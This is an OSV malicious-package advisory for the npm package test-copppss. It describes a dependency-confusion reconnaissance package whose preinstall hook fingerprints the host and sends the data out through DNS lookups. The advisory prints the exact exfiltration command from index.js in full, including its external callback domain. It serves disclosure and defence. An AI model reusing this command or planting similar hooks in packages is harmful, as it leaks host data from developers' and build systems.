MAL-2026-5926

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/test-copppss/MAL-2026-5926.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5926
Published
2026-06-16T20:01:12Z
Modified
2026-06-16T21:16:47.348399011Z
Summary
Malicious code in test-copppss (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (03106e028cee7749b7f3a9b327142fc0a402574bc72f3a62d129aa891afe85fe)

On npm install, the package's preinstall hook (node index.js > /dev/null 2>&1) runs a shell pipeline that collects host identifiers — hostname, pwd, whoami, the package name test-copppss, and the machine's public IP via curl https://ifconfig.me — hex-encodes the concatenation with xxd -p, and exfiltrates it as DNS subdomain lookups to *.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com (a Burp Collaborator OAST endpoint controlled by the operator). Code at index.js:2 is exec("a=$(hostname;pwd;whoami;echo 'test-copppss';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com;done"). The package metadata (empty description, near-max version 1.999.0 to win semver resolution, single trivial dependency, preinstall beacon) matches the canonical dependency-confusion / namespace-claim reconnaissance shape — the attacker is probing which internal build systems resolve test-copppss to this public name and is harvesting the host fingerprint of any environment that does.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.999.0"
            ],
            "sha256": "03106e028cee7749b7f3a9b327142fc0a402574bc72f3a62d129aa891afe85fe",
            "import_time": "2026-06-16T21:06:47.486296869Z",
            "modified_time": "2026-06-16T20:01:12Z",
            "id": "IN-MAL-2026-006832",
            "source": "amazon-inspector"
        }
    ]
}
References
Credits

Affected packages

npm / test-copppss

Package

Affected ranges

Affected versions

1.*
1.999.0

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "test-copppss-1.999.0.tgz",
            "hashes": {
                "sha1": "29bad4751233c7c0ee7d1310d4366f4b4faf445e",
                "sha512_sri": "sha512-z2EvjEhn7DfCm9tJR066inupnlGR1YOUo0hCWAO0P9WATEs9yERdTehtmD25RKHUQnFRaMUSY4JGN5V8a3fxrw=="
            }
        }
    ],
    "evidence_files": [
        {
            "tlsh": "5ae0f1d0f6aa9b3273e110419c051017b4c3beab1c72dc02164cc53d22c0e86a0b45d6",
            "sha256": "593ec91dfcc3dd5894e18beef9c0cbb072c8f19d544cabf24784cd1a790bc437",
            "path": "index.js"
        },
        {
            "tlsh": "90e07d345e216f3332c801911c1a5003a3a1cf1f0018bd0973cb051c408e677acfe31d",
            "sha256": "24d4d768dc9a64ff9fcfd88cb655576adf4ca3b9e888b38b5324ca46acc7e531",
            "path": "package.json"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/test-copppss/MAL-2026-5926.json"